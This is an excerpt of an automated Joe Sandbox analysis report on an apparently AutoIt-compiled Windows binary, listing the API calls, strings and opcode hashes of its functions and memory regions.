                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: prt$%q
                    • API String ID: 3964851224-2435252290
                    • Opcode ID: 4a342591f06cd40556d189050b5e780adc101e21437b87b882a14200f5385295
                    • Instruction ID: 4dcf8385816c4d6573e233d853c9831c78c974190ea65043b313def69ca63ae6
                    • Opcode Fuzzy Hash: 4a342591f06cd40556d189050b5e780adc101e21437b87b882a14200f5385295
                    • Instruction Fuzzy Hash: 4C9267746083418FEB24DF14C490B6AB7E6FF89304F14896DE89A8B752DB71EC45CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: Dtt$Dtt$Dtt$Dtt$Variable must be of type 'Object'.
                    • API String ID: 0-2218409961
                    • Opcode ID: 1d8be787de1a8ccf3e3a714c45842adeee05d544cc9e8042c6b0ca508dd3f248
                    • Instruction ID: 976394eed48a4ab347d0e3209ed1a7b2c12ddd4fb7bfb4c4d846ca53c647b5ef
                    • Opcode Fuzzy Hash: 1d8be787de1a8ccf3e3a714c45842adeee05d544cc9e8042c6b0ca508dd3f248
                    • Instruction Fuzzy Hash: BEA29C74A04215CFCB24EF98C490AADB7B3FF49304F248269E916AB351D776ED42CB91
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,006BE7C1), ref: 006E46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 006E46B7
                    • FindClose.KERNEL32(00000000), ref: 006E46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 8bb16e8b2ef216a5218a3a91cb67f382b45752721258c063cc01ced17a19bde3
                    • Instruction ID: 32ca9fd88bf31f27eae876de8064d0711a1c31fff9b446912539c26eb5eb8240
                    • Opcode Fuzzy Hash: 8bb16e8b2ef216a5218a3a91cb67f382b45752721258c063cc01ced17a19bde3
                    • Instruction Fuzzy Hash: 8EE0D8314115009B8620B738EC4D4EE775D9E06335F104715F935C15E0EFB469508599
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00690BBB
                    • timeGetTime.WINMM ref: 00690E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00690FB3
                    • TranslateMessage.USER32(?), ref: 00690FC7
                    • DispatchMessageW.USER32(?), ref: 00690FD5
                    • Sleep.KERNEL32(0000000A), ref: 00690FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0069105A
                    • DestroyWindow.USER32 ref: 00691066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00691080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 006C52AD
                    • TranslateMessage.USER32(?), ref: 006C608A
                    • DispatchMessageW.USER32(?), ref: 006C6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006C60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prt$prt$prt$prt
                    • API String ID: 4003667617-960707843
                    • Opcode ID: e569b8de3c80766e04ff58c01943f0deb17f60d997c855ab85fd5414c3b2faec
                    • Instruction ID: 665523899b454a7e85f66e3c6ceb2782e907360756d84c4e9b96a588f290a370
                    • Opcode Fuzzy Hash: e569b8de3c80766e04ff58c01943f0deb17f60d997c855ab85fd5414c3b2faec
                    • Instruction Fuzzy Hash: 1FB2C170608741DFDB28DF24C884FAAB7E6FF85304F144A1DE44A876A1DB75E885CB86

                    Control-flow Graph

                    APIs
                      • Part of subcall function 006E91E9: __time64.LIBCMT ref: 006E91F3
                      • Part of subcall function 00685045: _fseek.LIBCMT ref: 0068505D
                    • __wsplitpath.LIBCMT ref: 006E94BE
                      • Part of subcall function 006A432E: __wsplitpath_helper.LIBCMT ref: 006A436E
                    • _wcscpy.LIBCMT ref: 006E94D1
                    • _wcscat.LIBCMT ref: 006E94E4
                    • __wsplitpath.LIBCMT ref: 006E9509
                    • _wcscat.LIBCMT ref: 006E951F
                    • _wcscat.LIBCMT ref: 006E9532
                      • Part of subcall function 006E922F: _memmove.LIBCMT ref: 006E9268
                      • Part of subcall function 006E922F: _memmove.LIBCMT ref: 006E9277
                    • _wcscmp.LIBCMT ref: 006E9479
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AAE
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006E96DC
                    • _wcsncpy.LIBCMT ref: 006E974F
                    • DeleteFileW.KERNEL32(?,?), ref: 006E9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006E979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006E97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 2a44bd4c420f2e3c1a76ea6bdea8891e91ab136e683468ee62966adf9d87678f
                    • Instruction ID: 7ae5032c4642ab7bbd9e5a23aabca3bdaefed97792396446cba061ca67178581
                    • Opcode Fuzzy Hash: 2a44bd4c420f2e3c1a76ea6bdea8891e91ab136e683468ee62966adf9d87678f
                    • Instruction Fuzzy Hash: 5AC140B1D01219AEDF61EF95CC85ADEB7BEEF45300F0040AAF609E7241DB709A848F65

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683074
                    • RegisterClassExW.USER32(00000030), ref: 0068309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                    • LoadIconW.USER32(000000A9), ref: 006830F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 02adac3f9d8be60af2ce636fd7b53ef2e14b25ee8eca5f63b17da3ca67ca53ab
                    • Instruction ID: 2bfff9b40f13b25a5102804c6d079f36280f74d074cb8568871acc472e284396
                    • Opcode Fuzzy Hash: 02adac3f9d8be60af2ce636fd7b53ef2e14b25ee8eca5f63b17da3ca67ca53ab
                    • Instruction Fuzzy Hash: 88315EB5800309EFDB50CFA4DC85AD9BFF4FB0A310F14826AE540EA2A1D7B94541CF55

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683074
                    • RegisterClassExW.USER32(00000030), ref: 0068309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                    • LoadIconW.USER32(000000A9), ref: 006830F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 2cfa6f77a157d1bbced0b5b685ddc632a0c0a4a3c269477f458651f1172995d6
                    • Instruction ID: 02693d02158e94d184a26cee0a1376ed6414c8a80f10886dc87e2c6abadfaf21
                    • Opcode Fuzzy Hash: 2cfa6f77a157d1bbced0b5b685ddc632a0c0a4a3c269477f458651f1172995d6
                    • Instruction Fuzzy Hash: CD21C9B5951318EFDB10DF94EC49B9DBBF8FB0A700F00822AF510A62A0D7B945448F9A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00684864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007462F8,?,006837C0,?), ref: 00684882
                      • Part of subcall function 006A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006872C5), ref: 006A0771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00687308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006BECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006BED32
                    • RegCloseKey.ADVAPI32(?), ref: 006BED70
                    • _wcscat.LIBCMT ref: 006BEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 445d22e1475fd79896cf1583b6052f9b2646e7e49e969ba738a230baabc151a6
                    • Instruction ID: d9bd4b8eae50e3bc6bc7cf6e0130d9ceea625996010fcb866968d36c8d8ca63e
                    • Opcode Fuzzy Hash: 445d22e1475fd79896cf1583b6052f9b2646e7e49e969ba738a230baabc151a6
                    • Instruction Fuzzy Hash: 5171A3B55083019EC318EF25EC8189BB7F9FF56740F408A2EF445832A1DBB4D989CB99

                    Control-flow Graph

                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 006836D2
                    • KillTimer.USER32(?,00000001), ref: 006836FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0068371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068372A
                    • CreatePopupMenu.USER32 ref: 0068373E
                    • PostQuitMessage.USER32(00000000), ref: 0068375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%q
                    • API String ID: 129472671-1866366108
                    • Opcode ID: 1a9dd3bd220fc2c6acb58d5191cf661bb570aabe1f69f1692c734eb406150724
                    • Instruction ID: b37315feaab32e759e6e60494f626799c727de595cb6198a0a1a995108b9ad52
                    • Opcode Fuzzy Hash: 1a9dd3bd220fc2c6acb58d5191cf661bb570aabe1f69f1692c734eb406150724
                    • Instruction Fuzzy Hash: F941C5B1200155BBDF247B28DC49BBD375BE702B00F144729F502863A1EBA9EA85976B

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00683A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00683A71
                    • LoadIconW.USER32(00000063), ref: 00683A88
                    • LoadIconW.USER32(000000A4), ref: 00683A9A
                    • LoadIconW.USER32(000000A2), ref: 00683AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00683AD2
                    • RegisterClassExW.USER32(?), ref: 00683B28
                      • Part of subcall function 00683041: GetSysColorBrush.USER32(0000000F), ref: 00683074
                      • Part of subcall function 00683041: RegisterClassExW.USER32(00000030), ref: 0068309E
                      • Part of subcall function 00683041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006830AF
                      • Part of subcall function 00683041: InitCommonControlsEx.COMCTL32(?), ref: 006830CC
                      • Part of subcall function 00683041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006830DC
                      • Part of subcall function 00683041: LoadIconW.USER32(000000A9), ref: 006830F2
                      • Part of subcall function 00683041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00683101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: a80eeb475bdd63469ba473e43e1b30c1aa9966b0878de17b43b85e87ef6b3d95
                    • Instruction ID: bb8829104ce4c1d49ee7b071b467b395e083df0bd0673623accbf038abd8bba7
                    • Opcode Fuzzy Hash: a80eeb475bdd63469ba473e43e1b30c1aa9966b0878de17b43b85e87ef6b3d95
                    • Instruction Fuzzy Hash: 7E212B75900304FFEB109FA4EC09B9D7BB5FB0A711F00822AE504A62A0D7FE56548F9A

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bt
                    • API String ID: 1825951767-502447194
                    • Opcode ID: 038572abe49584797b93592b014b1b1ccafdd5fd8c05366fb91bf3cbe8cf0462
                    • Instruction ID: 3123b860f8259a3061ec5e249c399bdd11e3eb0d58ef6289c3e80167d11952e0
                    • Opcode Fuzzy Hash: 038572abe49584797b93592b014b1b1ccafdd5fd8c05366fb91bf3cbe8cf0462
                    • Instruction Fuzzy Hash: 5FA18575910229AACF54FF90CC959EEB7BABF15700F04062EF412B7291EF749A05CB64

                    Control-flow Graph

                    APIs
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A03D3
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006A03DB
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A03E6
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A03F1
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006A03F9
                      • Part of subcall function 006A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 006A0401
                      • Part of subcall function 00696259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0068FA90), ref: 006962B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0068FB2D
                    • OleInitialize.OLE32(00000000), ref: 0068FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 006C49F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <gt$X<$\dt$%q$ct
                    • API String ID: 1986988660-2227744020
                    • Opcode ID: 2a52b9531e82b0b3e43fd1ac8db76ca93ac4f2b7100b741726ae898a0c7001cf
                    • Instruction ID: 6c864f4570d29d7a12fee57b62faaec166cf0fbb211a811465de1a75cfbdcfca
                    • Opcode Fuzzy Hash: 2a52b9531e82b0b3e43fd1ac8db76ca93ac4f2b7100b741726ae898a0c7001cf
                    • Instruction Fuzzy Hash: 128199B89013908ECB84EF6DE9446557AE5EB8B718310C23FD119C7262EB3D8645CF1A

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 673908bc227372228f3d3d83964d1406c263db4277f261489385041ed23a4b77
                    • Instruction ID: 4cc966d9367429fcc63d6f5a985b4cb14c3d892072500723df0094446bbd494c
                    • Opcode Fuzzy Hash: 673908bc227372228f3d3d83964d1406c263db4277f261489385041ed23a4b77
                    • Instruction Fuzzy Hash: 40C170B1A0020D9FDF10CFA8D885BFEB7B6AF48314F158569EA09A7381E7709D45CB61

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036826C1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036828E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: 9d2cf5483f68f2eea1fd9052dd9731ac5f624aeade3bfe065b027ed00ee0548e
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: 1FA12874E00208EBDF14DFA4C9A8BEEB7B5BF48704F208A59E511BB280D7759A85CF54

                    Control-flow Graph

                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00683A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00683A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00683A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 205c6c4733b78ec7903ab83eba81fc9bd63e652eadcd25be8535b68d9072b240
                    • Instruction ID: b5a2e466230adfa1946b0e32e5d0e73cf78477891bf1a2eca54de4c98e42180f
                    • Opcode Fuzzy Hash: 205c6c4733b78ec7903ab83eba81fc9bd63e652eadcd25be8535b68d9072b240
                    • Instruction Fuzzy Hash: 38F0D0B5641290BEEB3117176C49E673E7DE7C7F60B00812AF904A21B0C6ED5851DA79
                    APIs
                      • Part of subcall function 036822A0: Sleep.KERNELBASE(000001F4), ref: 036822B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036824E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: E0BMD0J5JZ91Y
                    • API String ID: 2694422964-2772655244
                    • Opcode ID: 5a82d3a34d9a65303aa23dee2376ac79fc83dc622bfa76316a026a80e25912a3
                    • Instruction ID: c0acbcf0f855f8cd65742fe328b5d288144af0a2b8af752129b502255998596a
                    • Opcode Fuzzy Hash: 5a82d3a34d9a65303aa23dee2376ac79fc83dc622bfa76316a026a80e25912a3
                    • Instruction Fuzzy Hash: E2517130D14248DBEF11DBA4C825BEEB779AF58700F004699E609BB2C0D7B91B45CB6A
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006BD5EC
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • _memset.LIBCMT ref: 0068418D
                    • _wcscpy.LIBCMT ref: 006841E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006841F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
